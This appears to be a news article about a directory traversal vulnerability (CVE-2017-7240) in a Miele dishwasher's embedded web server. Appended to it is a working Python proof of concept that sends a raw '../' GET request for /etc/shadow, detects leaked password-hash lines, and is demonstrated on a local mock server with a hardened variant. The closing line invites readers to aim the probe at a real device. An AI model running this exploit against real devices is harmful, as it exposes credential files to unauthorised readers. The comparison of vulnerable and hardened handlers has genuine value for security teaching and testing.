Don't say you weren't warned: Miele went full Internet-of-Things with a network-connected dishwasher, gave it a web server, and now finds itself on the wrong end of a security bug report – and it's accused of ignoring the warning.
The utterly predictable vulnerability advisory on the Full Disclosure mailing list details CVE-2017-7240 – aka "Miele Professional PG 8528 - Web Server Directory Traversal." This is the built-in web server that's used to remotely control the glassware-cleaning machine from a browser.
"The corresponding embedded Web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks," reads the notice, dated Friday.
This attack was the 'sploit hotness in 1997. Congratulations, Miele: you have a 20-year-old security bug in your shiny brand-new dishwasher.
Proving it for yourself is simple: using a basic HTTP GET, fetch /../../../../../../../../../../../../etc/shadow from whichever IP address the dishwasher has on your network, and the shadow password file on its file system comes back in the response. That's pretty sad.
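The one snag in "just fetch it with a GET" is that most HTTP clients quietly remove the ../ segments before the request leaves the machine (curl does unless told --path-as-is), so a naive check can report the device as clean when it isn't. The following is an added example, not code from the advisory or from Miele: it sends the traversal request as raw bytes over a socket, checks whether the body looks like a shadow file, and runs against a constructed in-process stand-in for the vulnerable server (the FAKE_SHADOW contents, the /var/www docroot and the hardened variant are all made up for the demonstration).

```python
import posixpath
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in data; no real hashes, no real device involved.
DOCROOT = "/var/www"
FAKE_FS = {
    "/var/www/index.html": "<html>PST10 WebServer</html>\n",
    "/etc/shadow": "root:$6$saltsalt$hashhash:17000:0:99999:7:::\n"
                   "daemon:*:17000:0:99999:7:::\n",
}

# One shadow(5) record: name, hash, then seven colon-separated numeric/empty fields.
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d*:\d*:\d*:\d*:\d*:\d*:.*$", re.M)


def build_traversal_request(host, depth=12, target="etc/shadow"):
    """Build the raw GET by hand so the ../ segments are sent verbatim."""
    path = "/" + "../" * depth + target
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n").encode()


def looks_like_shadow(body):
    """True if the response body contains at least one shadow-format line."""
    return bool(SHADOW_LINE.search(body))


def probe(host, port, depth=12, timeout=5.0):
    """Send the traversal request over a plain socket; return (status, body, hit)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_traversal_request(host, depth))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks).decode("latin-1")
    head, _, body = raw.partition("\r\n\r\n")
    status = int(head.split(" ", 2)[1]) if head.startswith("HTTP/") else 0
    return status, body, looks_like_shadow(body)


class VulnerableHandler(BaseHTTPRequestHandler):
    """Mimics a server that glues docroot + request path and lets the OS resolve it."""
    HARDENED = False

    def do_GET(self):
        # self.path is the raw request target, dot-segments and all.
        resolved = posixpath.normpath(DOCROOT + self.path)
        inside = resolved == DOCROOT or resolved.startswith(DOCROOT + "/")
        if self.HARDENED and not inside:
            # Hardened form: refuse anything that resolves outside the docroot.
            self.send_response(403)
            self.end_headers()
            return
        content = FAKE_FS.get(resolved)
        if content is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(content.encode())

    def log_message(self, *args):  # keep the demo quiet
        pass


class HardenedHandler(VulnerableHandler):
    HARDENED = True


def start_fake_server(hardened=False):
    """Start the stand-in server on an ephemeral loopback port; returns (server, port)."""
    handler = HardenedHandler if hardened else VulnerableHandler
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    for hardened in (False, True):
        srv, port = start_fake_server(hardened)
        status, body, hit = probe("127.0.0.1", port)
        srv.shutdown()
        srv.server_close()
        print(f"hardened={hardened}: status={status} shadow_leaked={hit}")
```

Point probe() at the dishwasher's address and port 80 instead of the stand-in to reproduce the advisory's check; the regex is deliberately strict about the shadow record shape so an error page that merely mentions "root" does not count as a hit.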